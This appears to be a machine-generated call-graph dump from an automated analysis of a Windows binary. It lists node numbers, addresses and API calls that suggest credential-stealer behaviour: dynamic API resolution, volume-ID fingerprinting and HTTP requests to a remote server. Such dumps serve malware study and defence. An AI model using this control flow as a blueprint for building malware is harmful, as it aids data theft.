13884 6a6443 13883->13884 13885 6aa8a0 lstrcpy 13884->13885 13886 6a6455 13885->13886 13887 6aa8a0 lstrcpy 13886->13887 13888 6a6467 13887->13888 13889 6aa8a0 lstrcpy 13888->13889 13890 6a5b86 13889->13890 13890->13654 13892 6945c0 2 API calls 13891->13892 13893 6926b4 13892->13893 13894 6945c0 2 API calls 13893->13894 13895 6926d7 13894->13895 13896 6945c0 2 API calls 13895->13896 13897 6926f0 13896->13897 13898 6945c0 2 API calls 13897->13898 13899 692709 13898->13899 13900 6945c0 2 API calls 13899->13900 13901 692736 13900->13901 13902 6945c0 2 API calls 13901->13902 13903 69274f 13902->13903 13904 6945c0 2 API calls 13903->13904 13905 692768 13904->13905 13906 6945c0 2 API calls 13905->13906 13907 692795 13906->13907 13908 6945c0 2 API calls 13907->13908 13909 6927ae 13908->13909 13910 6945c0 2 API calls 13909->13910 13911 6927c7 13910->13911 13912 6945c0 2 API calls 13911->13912 13913 6927e0 13912->13913 13914 6945c0 2 API calls 13913->13914 13915 6927f9 13914->13915 13916 6945c0 2 API calls 13915->13916 13917 692812 13916->13917 13918 6945c0 2 API calls 13917->13918 13919 69282b 13918->13919 13920 6945c0 2 API calls 13919->13920 13921 692844 13920->13921 13922 6945c0 2 API calls 13921->13922 13923 69285d 13922->13923 13924 6945c0 2 API calls 13923->13924 13925 692876 13924->13925 13926 6945c0 2 API calls 13925->13926 13927 69288f 13926->13927 13928 6945c0 2 API calls 13927->13928 13929 6928a8 13928->13929 13930 6945c0 2 API calls 13929->13930 13931 6928c1 13930->13931 13932 6945c0 2 API calls 13931->13932 13933 6928da 13932->13933 13934 6945c0 2 API calls 13933->13934 13935 6928f3 13934->13935 13936 6945c0 2 API calls 13935->13936 13937 69290c 13936->13937 13938 6945c0 2 API calls 13937->13938 13939 692925 13938->13939 13940 6945c0 2 API calls 13939->13940 13941 69293e 13940->13941 13942 6945c0 2 API calls 13941->13942 13943 692957 13942->13943 13944 6945c0 2 API calls 13943->13944 13945 692970 13944->13945 13946 6945c0 2 API calls 13945->13946 13947 692989 13946->13947 13948 6945c0 2 API calls 13947->13948 13949 6929a2 13948->13949 13950 6945c0 2 API calls 13949->13950 13951 6929bb 13950->13951 13952 6945c0 2 API calls 13951->13952 13953 6929d4 13952->13953 13954 6945c0 2 API calls 13953->13954 13955 6929ed 13954->13955 13956 6945c0 2 API calls 13955->13956 13957 692a06 13956->13957 13958 6945c0 2 API calls 13957->13958 13959 692a1f 13958->13959 13960 6945c0 2 API calls 13959->13960 13961 692a38 13960->13961 13962 6945c0 2 API calls 13961->13962 13963 692a51 13962->13963 13964 6945c0 2 API calls 13963->13964 13965 692a6a 13964->13965 13966 6945c0 2 API calls 13965->13966 13967 692a83 13966->13967 13968 6945c0 2 API calls 13967->13968 13969 692a9c 13968->13969 13970 6945c0 2 API calls 13969->13970 13971 692ab5 13970->13971 13972 6945c0 2 API calls 13971->13972 13973 692ace 13972->13973 13974 6945c0 2 API calls 13973->13974 13975 692ae7 13974->13975 13976 6945c0 2 API calls 13975->13976 13977 692b00 13976->13977 13978 6945c0 2 API calls 13977->13978 13979 692b19 13978->13979 13980 6945c0 2 API calls 13979->13980 13981 692b32 13980->13981 13982 6945c0 2 API calls 13981->13982 13983 692b4b 13982->13983 13984 6945c0 2 API calls 13983->13984 13985 692b64 13984->13985 13986 6945c0 2 API calls 13985->13986 13987 692b7d 13986->13987 13988 6945c0 2 API calls 13987->13988 13989 692b96 13988->13989 13990 6945c0 2 API calls 13989->13990 13991 692baf 13990->13991 13992 6945c0 2 API calls 13991->13992 13993 692bc8 13992->13993 13994 6945c0 2 API calls 13993->13994 13995 692be1 13994->13995 13996 6945c0 2 API calls 13995->13996 13997 692bfa 13996->13997 13998 6945c0 2 API calls 13997->13998 13999 692c13 13998->13999 14000 6945c0 2 API calls 13999->14000 14001 692c2c 14000->14001 14002 6945c0 2 API calls 14001->14002 14003 692c45 14002->14003 14004 6945c0 2 API calls 14003->14004 14005 692c5e 14004->14005 14006 6945c0 2 API calls 14005->14006 14007 692c77 14006->14007 14008 6945c0 2 API calls 14007->14008 14009 692c90 14008->14009 14010 6945c0 2 API calls 14009->14010 14011 692ca9 14010->14011 14012 6945c0 2 API calls 14011->14012 14013 692cc2 14012->14013 14014 6945c0 2 API calls 14013->14014 14015 692cdb 14014->14015 14016 6945c0 2 API calls 14015->14016 14017 692cf4 14016->14017 14018 6945c0 2 API calls 14017->14018 14019 692d0d 14018->14019 14020 6945c0 2 API calls 14019->14020 14021 692d26 14020->14021 14022 6945c0 2 API calls 14021->14022 14023 692d3f 14022->14023 14024 6945c0 2 API calls 14023->14024 14025 692d58 14024->14025 14026 6945c0 2 API calls 14025->14026 14027 692d71 14026->14027 14028 6945c0 2 API calls 14027->14028 14029 692d8a 14028->14029 14030 6945c0 2 API calls 14029->14030 14031 692da3 14030->14031 14032 6945c0 2 API calls 14031->14032 14033 692dbc 14032->14033 14034 6945c0 2 API calls 14033->14034 14035 692dd5 14034->14035 14036 6945c0 2 API calls 14035->14036 14037 692dee 14036->14037 14038 6945c0 2 API calls 14037->14038 14039 692e07 14038->14039 14040 6945c0 2 API calls 14039->14040 14041 692e20 14040->14041 14042 6945c0 2 API calls 14041->14042 14043 692e39 14042->14043 14044 6945c0 2 API calls 14043->14044 14045 692e52 14044->14045 14046 6945c0 2 API calls 14045->14046 14047 692e6b 14046->14047 14048 6945c0 2 API calls 14047->14048 14049 692e84 14048->14049 14050 6945c0 2 API calls 14049->14050 14051 692e9d 14050->14051 14052 6945c0 2 API calls 14051->14052 14053 692eb6 14052->14053 14054 6945c0 2 API calls 14053->14054 14055 692ecf 14054->14055 14056 6945c0 2 API calls 14055->14056 14057 692ee8 14056->14057 14058 6945c0 2 API calls 14057->14058 14059 692f01 14058->14059 14060 6945c0 2 API calls 14059->14060 14061 692f1a 14060->14061 14062 6945c0 2 API calls 14061->14062 14063 692f33 14062->14063 14064 6945c0 2 API calls 14063->14064 14065 692f4c 14064->14065 14066 6945c0 2 API calls 14065->14066 14067 692f65 14066->14067 14068 6945c0 2 API calls 14067->14068 14069 692f7e 14068->14069 14070 6945c0 2 API calls 14069->14070 14071 692f97 14070->14071 14072 6945c0 2 API calls 14071->14072 14073 692fb0 14072->14073 14074 6945c0 2 API calls 14073->14074 14075 692fc9 14074->14075 14076 6945c0 2 API calls 14075->14076 14077 692fe2 14076->14077 14078 6945c0 2 API calls 14077->14078 14079 692ffb 14078->14079 14080 6945c0 2 API calls 14079->14080 14081 693014 14080->14081 14082 6945c0 2 API calls 14081->14082 14083 69302d 14082->14083 14084 6945c0 2 API calls 14083->14084 14085 693046 14084->14085 14086 6945c0 2 API calls 14085->14086 14087 69305f 14086->14087 14088 6945c0 2 API calls 14087->14088 14089 693078 14088->14089 14090 6945c0 2 API calls 14089->14090 14091 693091 14090->14091 14092 6945c0 2 API calls 14091->14092 14093 6930aa 14092->14093 14094 6945c0 2 API calls 14093->14094 14095 6930c3 14094->14095 14096 6945c0 2 API calls 14095->14096 14097 6930dc 14096->14097 14098 6945c0 2 API calls 14097->14098 14099 6930f5 14098->14099 14100 6945c0 2 API calls 14099->14100 14101 69310e 14100->14101 14102 6945c0 2 API calls 14101->14102 14103 693127 14102->14103 14104 6945c0 2 API calls 14103->14104 14105 693140 14104->14105 14106 6945c0 2 API calls 14105->14106 14107 693159 14106->14107 14108 6945c0 2 API calls 14107->14108 14109 693172 14108->14109 14110 6945c0 2 API calls 14109->14110 14111 69318b 14110->14111 14112 6945c0 2 API calls 14111->14112 14113 6931a4 14112->14113 14114 6945c0 2 API calls 14113->14114 14115 6931bd 14114->14115 14116 6945c0 2 API calls 14115->14116 14117 6931d6 14116->14117 14118 6945c0 2 API calls 14117->14118 14119 6931ef 14118->14119 14120 6945c0 2 API calls 14119->14120 14121 693208 14120->14121 14122 6945c0 2 API calls 14121->14122 14123 693221 14122->14123 14124 6945c0 2 API calls 14123->14124 14125 69323a 14124->14125 14126 6945c0 2 API calls 14125->14126 14127 693253 14126->14127 14128 6945c0 2 API calls 14127->14128 14129 69326c 14128->14129 14130 6945c0 2 API calls 14129->14130 14131 693285 14130->14131 14132 6945c0 2 API calls 14131->14132 14133 69329e 14132->14133 14134 6945c0 2 API calls 14133->14134 14135 6932b7 14134->14135 14136 6945c0 2 API calls 14135->14136 14137 6932d0 14136->14137 14138 6945c0 2 API calls 14137->14138 14139 6932e9 14138->14139 14140 6945c0 2 API calls 14139->14140 14141 693302 14140->14141 14142 6945c0 2 API calls 14141->14142 14143 69331b 14142->14143 14144 6945c0 2 API calls 14143->14144 14145 693334 14144->14145 14146 6945c0 2 API calls 14145->14146 14147 69334d 14146->14147 14148 6945c0 2 API calls 14147->14148 14149 693366 14148->14149 14150 6945c0 2 API calls 14149->14150 14151 69337f 14150->14151 14152 6945c0 2 API calls 14151->14152 14153 693398 14152->14153 14154 6945c0 2 API calls 14153->14154 14155 6933b1 14154->14155 14156 6945c0 2 API calls 14155->14156 14157 6933ca 14156->14157 14158 6945c0 2 API calls 14157->14158 14159 6933e3 14158->14159 14160 6945c0 2 API calls 14159->14160 14161 6933fc 14160->14161 14162 6945c0 2 API calls 14161->14162 14163 693415 14162->14163 14164 6945c0 2 API calls 14163->14164 14165 69342e 14164->14165 14166 6945c0 2 API calls 14165->14166 14167 693447 14166->14167 14168 6945c0 2 API calls 14167->14168 14169 693460 14168->14169 14170 6945c0 2 API calls 14169->14170 14171 693479 14170->14171 14172 6945c0 2 API calls 14171->14172 14173 693492 14172->14173 14174 6945c0 2 API calls 14173->14174 14175 6934ab 14174->14175 14176 6945c0 2 API calls 14175->14176 14177 6934c4 14176->14177 14178 6945c0 2 API calls 14177->14178 14179 6934dd 14178->14179 14180 6945c0 2 API calls 14179->14180 14181 6934f6 14180->14181 14182 6945c0 2 API calls 14181->14182 14183 69350f 14182->14183 14184 6945c0 2 API calls 14183->14184 14185 693528 14184->14185 14186 6945c0 2 API calls 14185->14186 14187 693541 14186->14187 14188 6945c0 2 API calls 14187->14188 14189 69355a 14188->14189 14190 6945c0 2 API calls 14189->14190 14191 693573 14190->14191 14192 6945c0 2 API calls 14191->14192 14193 69358c 14192->14193 14194 6945c0 2 API calls 14193->14194 14195 6935a5 14194->14195 14196 6945c0 2 API calls 14195->14196 14197 6935be 14196->14197 14198 6945c0 2 API calls 14197->14198 14199 6935d7 14198->14199 14200 6945c0 2 API calls 14199->14200 14201 6935f0 14200->14201 14202 6945c0 2 API calls 14201->14202 14203 693609 14202->14203 14204 6945c0 2 API calls 14203->14204 14205 693622 14204->14205 14206 6945c0 2 API calls 14205->14206 14207 69363b 14206->14207 14208 6945c0 2 API calls 14207->14208 14209 693654 14208->14209 14210 6945c0 2 API calls 14209->14210 14211 69366d 14210->14211 14212 6945c0 2 API calls 14211->14212 14213 693686 14212->14213 14214 6945c0 2 API calls 14213->14214 14215 69369f 14214->14215 14216 6945c0 2 API calls 14215->14216 14217 6936b8 14216->14217 14218 6945c0 2 API calls 14217->14218 14219 6936d1 14218->14219 14220 6945c0 2 API calls 14219->14220 14221 6936ea 14220->14221 14222 6945c0 2 API calls 14221->14222 14223 693703 14222->14223 14224 6945c0 2 API calls 14223->14224 14225 69371c 14224->14225 14226 6945c0 2 API calls 14225->14226 14227 693735 14226->14227 14228 6945c0 2 API calls 14227->14228 14229 69374e 14228->14229 14230 6945c0 2 API calls 14229->14230 14231 693767 14230->14231 14232 6945c0 2 API calls 14231->14232 14233 693780 14232->14233 14234 6945c0 2 API calls 14233->14234 14235 693799 14234->14235 14236 6945c0 2 API calls 14235->14236 14237 6937b2 14236->14237 14238 6945c0 2 API calls 14237->14238 14239 6937cb 14238->14239 14240 6945c0 2 API calls 14239->14240 14241 6937e4 14240->14241 14242 6945c0 2 API calls 14241->14242 14243 6937fd 14242->14243 14244 6945c0 2 API calls 14243->14244 14245 693816 14244->14245 14246 6945c0 2 API calls 14245->14246 14247 69382f 14246->14247 14248 6945c0 2 API calls 14247->14248 14249 693848 14248->14249 14250 6945c0 2 API calls 14249->14250 14251 693861 14250->14251 14252 6945c0 2 API calls 14251->14252 14253 69387a 14252->14253 14254 6945c0 2 API calls 14253->14254 14255 693893 14254->14255 14256 6945c0 2 API calls 14255->14256 14257 6938ac 14256->14257 14258 6945c0 2 API calls 14257->14258 14259 6938c5 14258->14259 14260 6945c0 2 API calls 14259->14260 14261 6938de 14260->14261 14262 6945c0 2 API calls 14261->14262 14263 6938f7 14262->14263 14264 6945c0 2 API calls 14263->14264 14265 693910 14264->14265 14266 6945c0 2 API calls 14265->14266 14267 693929 14266->14267 14268 6945c0 2 API calls 14267->14268 14269 693942 14268->14269 14270 6945c0 2 API calls 14269->14270 14271 69395b 14270->14271 14272 6945c0 2 API calls 14271->14272 14273 693974 14272->14273 14274 6945c0 2 API calls 14273->14274 14275 69398d 14274->14275 14276 6945c0 2 API calls 14275->14276 14277 6939a6 14276->14277 14278 6945c0 2 API calls 14277->14278 14279 6939bf 14278->14279 14280 6945c0 2 API calls 14279->14280 14281 6939d8 14280->14281 14282 6945c0 2 API calls 14281->14282 14283 6939f1 14282->14283 14284 6945c0 2 API calls 14283->14284 14285 693a0a 14284->14285 14286 6945c0 2 API calls 14285->14286 14287 693a23 14286->14287 14288 6945c0 2 API calls 14287->14288 14289 693a3c 14288->14289 14290 6945c0 2 API calls 14289->14290 14291 693a55 14290->14291 14292 6945c0 2 API calls 14291->14292 14293 693a6e 14292->14293 14294 6945c0 2 API calls 14293->14294 14295 693a87 14294->14295 14296 6945c0 2 API calls 14295->14296 14297 693aa0 14296->14297 14298 6945c0 2 API calls 14297->14298 14299 693ab9 14298->14299 14300 6945c0 2 API calls 14299->14300 14301 693ad2 14300->14301 14302 6945c0 2 API calls 14301->14302 14303 693aeb 14302->14303 14304 6945c0 2 API calls 14303->14304 14305 693b04 14304->14305 14306 6945c0 2 API calls 14305->14306 14307 693b1d 14306->14307 14308 6945c0 2 API calls 14307->14308 14309 693b36 14308->14309 14310 6945c0 2 API calls 14309->14310 14311 693b4f 14310->14311 14312 6945c0 2 API calls 14311->14312 14313 693b68 14312->14313 14314 6945c0 2 API calls 14313->14314 14315 693b81 14314->14315 14316 6945c0 2 API calls 14315->14316 14317 693b9a 14316->14317 14318 6945c0 2 API calls 14317->14318 14319 693bb3 14318->14319 14320 6945c0 2 API calls 14319->14320 14321 693bcc 14320->14321 14322 6945c0 2 API calls 14321->14322 14323 693be5 14322->14323 14324 6945c0 2 API calls 14323->14324 14325 693bfe 14324->14325 14326 6945c0 2 API calls 14325->14326 14327 693c17 14326->14327 14328 6945c0 2 API calls 14327->14328 14329 693c30 14328->14329 14330 6945c0 2 API calls 14329->14330 14331 693c49 14330->14331 14332 6945c0 2 API calls 14331->14332 14333 693c62 14332->14333 14334 6945c0 2 API calls 14333->14334 14335 693c7b 14334->14335 14336 6945c0 2 API calls 14335->14336 14337 693c94 14336->14337 14338 6945c0 2 API calls 14337->14338 14339 693cad 14338->14339 14340 6945c0 2 API calls 14339->14340 14341 693cc6 14340->14341 14342 6945c0 2 API calls 14341->14342 14343 693cdf 14342->14343 14344 6945c0 2 API calls 14343->14344 14345 693cf8 14344->14345 14346 6945c0 2 API calls 14345->14346 14347 693d11 14346->14347 14348 6945c0 2 API calls 14347->14348 14349 693d2a 14348->14349 14350 6945c0 2 API calls 14349->14350 14351 693d43 14350->14351 14352 6945c0 2 API calls 14351->14352 14353 693d5c 14352->14353 14354 6945c0 2 API calls 14353->14354 14355 693d75 14354->14355 14356 6945c0 2 API calls 14355->14356 14357 693d8e 14356->14357 14358 6945c0 2 API calls 14357->14358 14359 693da7 14358->14359 14360 6945c0 2 API calls 14359->14360 14361 693dc0 14360->14361 14362 6945c0 2 API calls 14361->14362 14363 693dd9 14362->14363 14364 6945c0 2 API calls 14363->14364 14365 693df2 14364->14365 14366 6945c0 2 API calls 14365->14366 14367 693e0b 14366->14367 14368 6945c0 2 API calls 14367->14368 14369 693e24 14368->14369 14370 6945c0 2 API calls 14369->14370 14371 693e3d 14370->14371 14372 6945c0 2 API calls 14371->14372 14373 693e56 14372->14373 14374 6945c0 2 API calls 14373->14374 14375 693e6f 14374->14375 14376 6945c0 2 API calls 14375->14376 14377 693e88 14376->14377 14378 6945c0 2 API calls 14377->14378 14379 693ea1 14378->14379 14380 6945c0 2 API calls 14379->14380 14381 693eba 14380->14381 14382 6945c0 2 API calls 14381->14382 14383 693ed3 14382->14383 14384 6945c0 2 API calls 14383->14384 14385 693eec 14384->14385 14386 6945c0 2 API calls 14385->14386 14387 693f05 14386->14387 14388 6945c0 2 API calls 14387->14388 14389 693f1e 14388->14389 14390 6945c0 2 API calls 14389->14390 14391 693f37 14390->14391 14392 6945c0 2 API calls 14391->14392 14393 693f50 14392->14393 14394 6945c0 2 API calls 14393->14394 14395 693f69 14394->14395 14396 6945c0 2 API calls 14395->14396 14397 693f82 14396->14397 14398 6945c0 2 API calls 14397->14398 14399 693f9b 14398->14399 14400 6945c0 2 API calls 14399->14400 14401 693fb4 14400->14401 14402 6945c0 2 API calls 14401->14402 14403 693fcd 14402->14403 14404 6945c0 2 API calls 14403->14404 14405 693fe6 14404->14405 14406 6945c0 2 API calls 14405->14406 14407 693fff 14406->14407 14408 6945c0 2 API calls 14407->14408 14409 694018 14408->14409 14410 6945c0 2 API calls 14409->14410 14411 694031 14410->14411 14412 6945c0 2 API calls 14411->14412 14413 69404a 14412->14413 14414 6945c0 2 API calls 14413->14414 14415 694063 14414->14415 14416 6945c0 2 API calls 14415->14416 14417 69407c 14416->14417 14418 6945c0 2 API calls 14417->14418 14419 694095 14418->14419 14420 6945c0 2 API calls 14419->14420 14421 6940ae 14420->14421 14422 6945c0 2 API calls 14421->14422 14423 6940c7 14422->14423 14424 6945c0 2 API calls 14423->14424 14425 6940e0 14424->14425 14426 6945c0 2 API calls 14425->14426 14427 6940f9 14426->14427 14428 6945c0 2 API calls 14427->14428 14429 694112 14428->14429 14430 6945c0 2 API calls 14429->14430 14431 69412b 14430->14431 14432 6945c0 2 API calls 14431->14432 14433 694144 14432->14433 14434 6945c0 2 API calls 14433->14434 14435 69415d 14434->14435 14436 6945c0 2 API calls 14435->14436 14437 694176 14436->14437 14438 6945c0 2 API calls 14437->14438 14439 69418f 14438->14439 14440 6945c0 2 API calls 14439->14440 14441 6941a8 14440->14441 14442 6945c0 2 API calls 14441->14442 14443 6941c1 14442->14443 14444 6945c0 2 API calls 14443->14444 14445 6941da 14444->14445 14446 6945c0 2 API calls 14445->14446 14447 6941f3 14446->14447 14448 6945c0 2 API calls 14447->14448 14449 69420c 14448->14449 14450 6945c0 2 API calls 14449->14450 14451 694225 14450->14451 14452 6945c0 2 API calls 14451->14452 14453 69423e 14452->14453 14454 6945c0 2 API calls 14453->14454 14455 694257 14454->14455 14456 6945c0 2 API calls 14455->14456 14457 694270 14456->14457 14458 6945c0 2 API calls 14457->14458 14459 694289 14458->14459 14460 6945c0 2 API calls 14459->14460 14461 6942a2 14460->14461 14462 6945c0 2 API calls 14461->14462 14463 6942bb 14462->14463 14464 6945c0 2 API calls 14463->14464 14465 6942d4 14464->14465 14466 6945c0 2 API calls 14465->14466 14467 6942ed 14466->14467 14468 6945c0 2 API calls 14467->14468 14469 694306 14468->14469 14470 6945c0 2 API calls 14469->14470 14471 69431f 14470->14471 14472 6945c0 2 API calls 14471->14472 14473 694338 14472->14473 14474 6945c0 2 API calls 14473->14474 14475 694351 14474->14475 14476 6945c0 2 API calls 14475->14476 14477 69436a 14476->14477 14478 6945c0 2 API calls 14477->14478 14479 694383 14478->14479 14480 6945c0 2 API calls 14479->14480 14481 69439c 14480->14481 14482 6945c0 2 API calls 14481->14482 14483 6943b5 14482->14483 14484 6945c0 2 API calls 14483->14484 14485 6943ce 14484->14485 14486 6945c0 2 API calls 14485->14486 14487 6943e7 14486->14487 14488 6945c0 2 API calls 14487->14488 14489 694400 14488->14489 14490 6945c0 2 API calls 14489->14490 14491 694419 14490->14491 14492 6945c0 2 API calls 14491->14492 14493 694432 14492->14493 14494 6945c0 2 API calls 14493->14494 14495 69444b 14494->14495 14496 6945c0 2 API calls 14495->14496 14497 694464 14496->14497 14498 6945c0 2 API calls 14497->14498 14499 69447d 14498->14499 14500 6945c0 2 API calls 14499->14500 14501 694496 14500->14501 14502 6945c0 2 API calls 14501->14502 14503 6944af 14502->14503 14504 6945c0 2 API calls 14503->14504 14505 6944c8 14504->14505 14506 6945c0 2 API calls 14505->14506 14507 6944e1 14506->14507 14508 6945c0 2 API calls 14507->14508 14509 6944fa 14508->14509 14510 6945c0 2 API calls 14509->14510 14511 694513 14510->14511 14512 6945c0 2 API calls 14511->14512 14513 69452c 14512->14513 14514 6945c0 2 API calls 14513->14514 14515 694545 14514->14515 14516 6945c0 2 API calls 14515->14516 14517 69455e 14516->14517 14518 6945c0 2 API calls 14517->14518 14519 694577 14518->14519 14520 6945c0 2 API calls 14519->14520 14521 694590 14520->14521 14522 6945c0 2 API calls 14521->14522 14523 6945a9 14522->14523 14524 6a9c10 14523->14524 14525 6a9c20 43 API calls 14524->14525 14526 6aa036 8 API calls 14524->14526 14525->14526 14527 6aa0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14526->14527 14528 6aa146 14526->14528 14527->14528 14529 6aa153 8 API calls 14528->14529 14530 6aa216 14528->14530 14529->14530 14531 6aa298 14530->14531 14532 6aa21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14530->14532 14533 6aa337 14531->14533 14534 6aa2a5 6 API calls 14531->14534 14532->14531 14535 6aa41f 14533->14535 14536 6aa344 9 API calls 14533->14536 14534->14533 14537 6aa428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14535->14537 14538 6aa4a2 14535->14538 14536->14535 14537->14538 14539 6aa4ab GetProcAddress GetProcAddress 14538->14539 14540 6aa4dc 14538->14540 14539->14540 14541 6aa515 14540->14541 14542 6aa4e5 GetProcAddress GetProcAddress 14540->14542 14543 6aa612 14541->14543 14544 6aa522 10 API calls 14541->14544 14542->14541 14545 6aa61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14543->14545 14546 6aa67d 14543->14546 14544->14543 14545->14546 14547 6aa69e 14546->14547 14548 6aa686 GetProcAddress 14546->14548 14549 6a5ca3 14547->14549 14550 6aa6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14547->14550 14548->14547 14551 691590 14549->14551 14550->14549 15672 691670 14551->15672 14554 6aa7a0 lstrcpy 14555 6915b5 14554->14555 14556 6aa7a0 lstrcpy 14555->14556 14557 6915c7 14556->14557 14558 6aa7a0 lstrcpy 14557->14558 14559 6915d9 14558->14559 14560 6aa7a0 lstrcpy 14559->14560 14561 691663 14560->14561 14562 6a5510 14561->14562 14563 6a5521 14562->14563 14564 6aa820 2 API calls 14563->14564 14565 6a552e 14564->14565 14566 6aa820 2 API calls 14565->14566 14567 6a553b 14566->14567 14568 6aa820 2 API calls 14567->14568 14569 6a5548 14568->14569 14570 6aa740 lstrcpy 14569->14570 14571 6a5555 14570->14571 14572 6aa740 lstrcpy 14571->14572 14573 6a5562 14572->14573 14574 6aa740 lstrcpy 14573->14574 14575 6a556f 14574->14575 14576 6aa740 lstrcpy 14575->14576 14616 6a557c 14576->14616 14577 6a5643 StrCmpCA 14577->14616 14578 6a56a0 StrCmpCA 14579 6a57dc 14578->14579 14578->14616 14580 6aa8a0 lstrcpy 14579->14580 14581 6a57e8 14580->14581 14582 6aa820 2 API calls 14581->14582 14584 6a57f6 14582->14584 14583 6aa820 lstrlen lstrcpy 14583->14616 14586 6aa820 2 API calls 14584->14586 14585 6a5856 StrCmpCA 14587 6a5991 14585->14587 14585->14616 14591 6a5805 14586->14591 14590 6aa8a0 lstrcpy 14587->14590 14588 6aa740 lstrcpy 14588->14616 14589 6aa7a0 lstrcpy 14589->14616 14592 6a599d 14590->14592 14593 691670 lstrcpy 14591->14593 14595 6aa820 2 API calls 14592->14595 14613 6a5811 14593->14613 14594 691590 lstrcpy 14594->14616 14596 6a59ab 14595->14596 14599 6aa820 2 API calls 14596->14599 14597 6a5a0b StrCmpCA 14600 6a5a28 14597->14600 14601 6a5a16 Sleep 14597->14601 14598 6a52c0 25 API calls 14598->14616 14602 6a59ba 14599->14602 14603 6aa8a0 lstrcpy 14600->14603 14601->14616 14605 691670 lstrcpy 14602->14605 14606 6a5a34 14603->14606 14604 6aa8a0 lstrcpy 14604->14616 14605->14613 14607 6aa820 2 API calls 14606->14607 14608 6a5a43 14607->14608 14609 6aa820 2 API calls 14608->14609 14610 6a5a52 14609->14610 14612 691670 lstrcpy 14610->14612 14611 6a578a StrCmpCA 14611->14616 14612->14613 14613->13669 14614 6a593f StrCmpCA 14614->14616 14615 6a51f0 20 API calls 14615->14616 14616->14577 14616->14578 14616->14583 14616->14585 14616->14588 14616->14589 14616->14594 14616->14597 14616->14598 14616->14604 14616->14611 14616->14614 14616->14615 14618 6a754c 14617->14618 14619 6a7553 GetVolumeInformationA 14617->14619 14618->14619 14620 6a7591 14619->14620 14621 6a75fc GetProcessHeap RtlAllocateHeap 14620->14621 14622 6a7628 wsprintfA 14621->14622 14623 6a7619 14621->14623 14625 6aa740 lstrcpy 14622->14625 14624 6aa740 lstrcpy 14623->14624 14626 6a5da7 14624->14626 14625->14626 14626->13690 14628 6aa7a0 lstrcpy 14627->14628 14629 694899 14628->14629 15681 6947b0 14629->15681 14631 6948a5 14632 6aa740 lstrcpy 14631->14632 14633 6948d7 14632->14633 14634 6aa740 lstrcpy 14633->14634 14635 6948e4 14634->14635 14636 6aa740 lstrcpy 14635->14636 14637 6948f1 14636->14637 14638 6aa740 lstrcpy 14637->14638 14639 6948fe 14638->14639 14640 6aa740 lstrcpy 14639->14640 14641 69490b InternetOpenA StrCmpCA 14640->14641 14642 694944 14641->14642 14643 694ecb InternetCloseHandle 14642->14643 15687 6a8b60 14642->15687 14645 694ee8 14643->14645 15702 699ac0 CryptStringToBinaryA 14645->15702 14646 694963 15695 6aa920 14646->15695 14649 694976 14651 6aa8a0 lstrcpy 14649->14651 14656 69497f 14651->14656 14652 6aa820 2 API calls 14653 694f05 14652->14653 14654 6aa9b0 4 API calls 14653->14654 14657 694f1b 14654->14657 14655 694f27 codecvt 14659 6aa7a0 lstrcpy 14655->14659 14660 6aa9b0 4 API calls 14656->14660 14658 6aa8a0 lstrcpy 14657->14658 14658->14655 14672 694f57 14659->14672 14661 6949a9 14660->14661 14662 6aa8a0 lstrcpy 14661->14662 14663 6949b2 14662->14663 14664 6aa9b0 4 API calls 14663->14664 14665 6949d1 14664->14665 14666 6aa8a0 lstrcpy 14665->14666 14667 6949da 14666->14667 14668 6aa920 3 API calls 14667->14668 14669 6949f8 14668->14669 14670 6aa8a0 lstrcpy 14669->14670 14671 694a01 14670->14671 14673 6aa9b0 4 API calls 14671->14673 14672->13693 14674 694a20 14673->14674 14675 6aa8a0 lstrcpy 14674->14675 14676 694a29 14675->14676 14677 6aa9b0 4 API calls 14676->14677 14678 694a48 14677->14678 14679 6aa8a0 lstrcpy 14678->14679 14680 694a51 14679->14680 14681 6aa9b0 4 API calls 14680->14681 14682 694a7d 14681->14682 14683 6aa920 3 API calls 14682->14683 14684 694a84 14683->14684 14685 6aa8a0 lstrcpy 14684->14685 14686 694a8d 14685->14686 14687 694aa3 InternetConnectA 14686->14687 14687->14643 14688 694ad3 HttpOpenRequestA 14687->14688 14690 694b28 14688->14690 14691 694ebe InternetCloseHandle 14688->14691 14692 6aa9b0 4 API calls 14690->14692 14691->14643 14693 694b3c 14692->14693 14694 6aa8a0 lstrcpy 14693->14694 14695 694b45 14694->14695 14696 6aa920 3 API calls 14695->14696 14697 694b63 14696->14697 14698 6aa8a0 lstrcpy 14697->14698 14699 694b6c 14698->14699 14700 6aa9b0 4 API calls 14699->14700 14701 694b8b 14700->14701 14702 6aa8a0 lstrcpy 14701->14702 14703 694b94 14702->14703 14704 6aa9b0 4 API calls 14703->14704 14705 694bb5 14704->14705 14706 6aa8a0 lstrcpy 14705->14706 14707 694bbe 14706->14707 14708 6aa9b0 4 API calls 14707->14708 14709 694bde 14708->14709 14710 6aa8a0 lstrcpy 14709->14710 14711 694be7 14710->14711 14712 6aa9b0 4 API calls 14711->14712 14713 694c06 14712->14713 14714 6aa8a0 lstrcpy 14713->14714 14715 694c0f 14714->14715 14716 6aa920 3 API calls 14715->14716 14717 694c2d 14716->14717 14718 6aa8a0 lstrcpy 14717->14718 14719 694c36 14718->14719 14720 6aa9b0 4 API calls 14719->14720 14721 694c55 14720->14721 14722 6aa8a0 lstrcpy 14721->14722 14723 694c5e 14722->14723 14724 6aa9b0 4 API calls 14723->14724 14725 694c7d 14724->14725 14726 6aa8a0 lstrcpy 14725->14726 14727 694c86 14726->14727 14728 6aa920 3 API calls 14727->14728 14729 694ca4 14728->14729 14730 6aa8a0 lstrcpy 14729->14730 14731 694cad 14730->14731 14732 6aa9b0 4 API calls 14731->14732 14733 694ccc 14732->14733 14734 6aa8a0 lstrcpy 14733->14734 14735 694cd5 14734->14735 14736 6aa9b0 4 API calls 14735->14736 14737 694cf6 14736->14737 14738 6aa8a0 lstrcpy 14737->14738 14739 694cff 14738->14739 14740 6aa9b0 4 API calls 14739->14740 14741 694d1f 14740->14741 14742 6aa8a0 lstrcpy 14741->14742 14743 694d28 14742->14743 14744 6aa9b0 4 API calls 14743->14744 14745 694d47 14744->14745 14746 6aa8a0 lstrcpy 14745->14746 14747 694d50 14746->14747 14748 6aa920 3 API calls 14747->14748 14749 694d6e 14748->14749 14750 6aa8a0 lstrcpy 14749->14750 14751 694d77 14750->14751 14752 6aa740 lstrcpy 14751->14752 14753 